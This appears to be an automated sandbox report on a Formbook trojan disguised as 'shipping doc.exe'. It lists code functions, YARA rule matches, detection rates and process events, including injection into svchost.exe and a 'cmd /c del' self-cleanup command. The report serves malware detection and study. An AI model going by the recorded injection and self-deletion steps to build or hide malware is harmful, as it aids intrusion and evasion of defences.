          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_000F997D0_2_000F997D
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_001019B00_2_001019B0
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_00107A4A0_2_00107A4A
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_00101C770_2_00101C77
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_00107CA70_2_00107CA7
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_0016BE440_2_0016BE44
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_00119EEE0_2_00119EEE
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_00101F320_2_00101F32
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_018236800_2_01823680
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041EAE21_2_0041EAE2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402D881_2_00402D88
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00409E501_2_00409E50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4E3F01_2_03A4E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B003E61_2_03B003E6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFA3521_2_03AFA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC02C01_2_03AC02C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE02741_2_03AE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF41A21_2_03AF41A2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B001AA1_2_03B001AA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF81CC1_2_03AF81CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A301001_2_03A30100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADA1181_2_03ADA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC81581_2_03AC8158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD20001_2_03AD2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3C7C01_2_03A3C7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A407701_2_03A40770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A647501_2_03A64750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5C6E01_2_03A5C6E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B005911_2_03B00591
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A405351_2_03A40535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AEE4F61_2_03AEE4F6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE44201_2_03AE4420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF24461_2_03AF2446
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF6BD71_2_03AF6BD7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFAB401_2_03AFAB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3EA801_2_03A3EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A429A01_2_03A429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B0A9A61_2_03B0A9A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A569621_2_03A56962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A268B81_2_03A268B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6E8F01_2_03A6E8F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4A8401_2_03A4A840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A428401_2_03A42840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ABEFA01_2_03ABEFA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A32FC81_2_03A32FC8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A82F281_2_03A82F28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A60F301_2_03A60F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE2F301_2_03AE2F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB4F401_2_03AB4F40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A52E901_2_03A52E90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFCE931_2_03AFCE93
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFEEDB1_2_03AFEEDB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFEE261_2_03AFEE26
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40E591_2_03A40E59
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A58DBF1_2_03A58DBF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3ADE01_2_03A3ADE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4AD001_2_03A4AD00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADCD1F1_2_03ADCD1F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0CB51_2_03AE0CB5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A30CF21_2_03A30CF2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A40C001_2_03A40C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A8739A1_2_03A8739A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF132D1_2_03AF132D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2D34C1_2_03A2D34C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A452A01_2_03A452A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE12ED1_2_03AE12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5D2F01_2_03A5D2F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5B2C01_2_03A5B2C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4B1B01_2_03A4B1B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A7516C1_2_03A7516C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2F1721_2_03A2F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B0B16B1_2_03B0B16B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF70E91_2_03AF70E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFF0E01_2_03AFF0E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AEF0CC1_2_03AEF0CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A470C01_2_03A470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFF7B01_2_03AFF7B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF16CC1_2_03AF16CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A856301_2_03A85630
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADD5B01_2_03ADD5B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B095C31_2_03B095C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF75711_2_03AF7571
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFF43F1_2_03AFF43F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A314601_2_03A31460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5FB801_2_03A5FB80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB5BF01_2_03AB5BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A7DBF91_2_03A7DBF9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFFB761_2_03AFFB76
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADDAAC1_2_03ADDAAC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A85AA01_2_03A85AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE1AA31_2_03AE1AA3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AEDAC61_2_03AEDAC6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB3A6C1_2_03AB3A6C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFFA491_2_03AFFA49
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF7A461_2_03AF7A46
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD59101_2_03AD5910
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A499501_2_03A49950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5B9501_2_03A5B950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A438E01_2_03A438E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAD8001_2_03AAD800
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFFFB11_2_03AFFFB1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A41F921_2_03A41F92
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A03FD21_2_03A03FD2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A03FD51_2_03A03FD5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFFF091_2_03AFFF09
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A49EB01_2_03A49EB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5FDC01_2_03A5FDC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF7D731_2_03AF7D73
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A43D401_2_03A43D40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF1D5A1_2_03AF1D5A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFFCF21_2_03AFFCF2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB9C321_2_03AB9C32
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: String function: 000FF9F2 appears 31 times
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: String function: 00100A30 appears 46 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03AAEA12 appears 86 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A2B970 appears 262 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A87E54 appears 107 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03ABF290 appears 103 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A75130 appears 58 times
          Source: shipping doc.exe, 00000000.00000003.1779406156.000000000440D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs shipping doc.exe
          Source: shipping doc.exe, 00000000.00000003.1779279793.0000000004263000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs shipping doc.exe
          Source: shipping doc.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: 0.2.shipping doc.exe.20d0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.shipping doc.exe.20d0000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.shipping doc.exe.20d0000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.shipping doc.exe.20d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.shipping doc.exe.20d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.shipping doc.exe.20d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.1895013100.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.1895013100.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.1895013100.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.1781373621.00000000020D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1781373621.00000000020D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.1781373621.00000000020D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.1895344034.00000000033B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.1895344034.00000000033B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.1895344034.00000000033B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.1898373344.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.1898373344.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.1898373344.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: shipping doc.exe PID: 2932, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: svchost.exe PID: 3804, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: classification engineClassification label: mal100.troj.evad.winEXE@23/5@29/15
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_001537B5 GetLastError,FormatMessageW,0_2_001537B5
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_001410BF AdjustTokenPrivileges,CloseHandle,0_2_001410BF
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_001416C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_001416C3
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_001551CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_001551CD
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_0016A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0016A67C
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_0015648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_0015648E
          Source: C:\Users\user\Desktop\shipping doc.exeCode function: 0_2_000E42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_000E42A2
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7128:120:WilError_03
          Source: C:\Users\user\Desktop\shipping doc.exeFile created: C:\Users\user\AppData\Local\Temp\autB93D.tmpJump to behavior
          Source: shipping doc.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\shipping doc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: shipping doc.exeReversingLabs: Detection: 52%
          Source: shipping doc.exeVirustotal: Detection: 55%
          Source: unknownProcess created: C:\Users\user\Desktop\shipping doc.exe "C:\Users\user\Desktop\shipping doc.exe"
          Source: C:\Users\user\Desktop\shipping doc.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\shipping doc.exe"
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=1992,i,10683895561274057007,5878391015423285478,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\help.exe "C:\Windows\SysWOW64\help.exe"
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\shipping doc.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\shipping doc.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\help.exe "C:\Windows\SysWOW64\help.exe"Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1988 --field-trial-handle=1992,i,10683895561274057007,5878391015423285478,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:2Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=1992,i,10683895561274057007,5878391015423285478,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2548 --field-trial-handle=1992,i,10683895561274057007,5878391015423285478,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --disable-nacl --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --time-ticks-at-unix-epoch=-1714734611839441 --launch-time-ticks=182597864 --mojo-platform-channel-handle=3040 --field-trial-handle=1992,i,10683895561274057007,5878391015423285478,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:1Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --disable-nacl --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --time-ticks-at-unix-epoch=-1714734611839441 --launch-time-ticks=182602404 --mojo-platform-channel-handle=3016 --field-trial-handle=1992,i,10683895561274057007,5878391015423285478,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:1Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
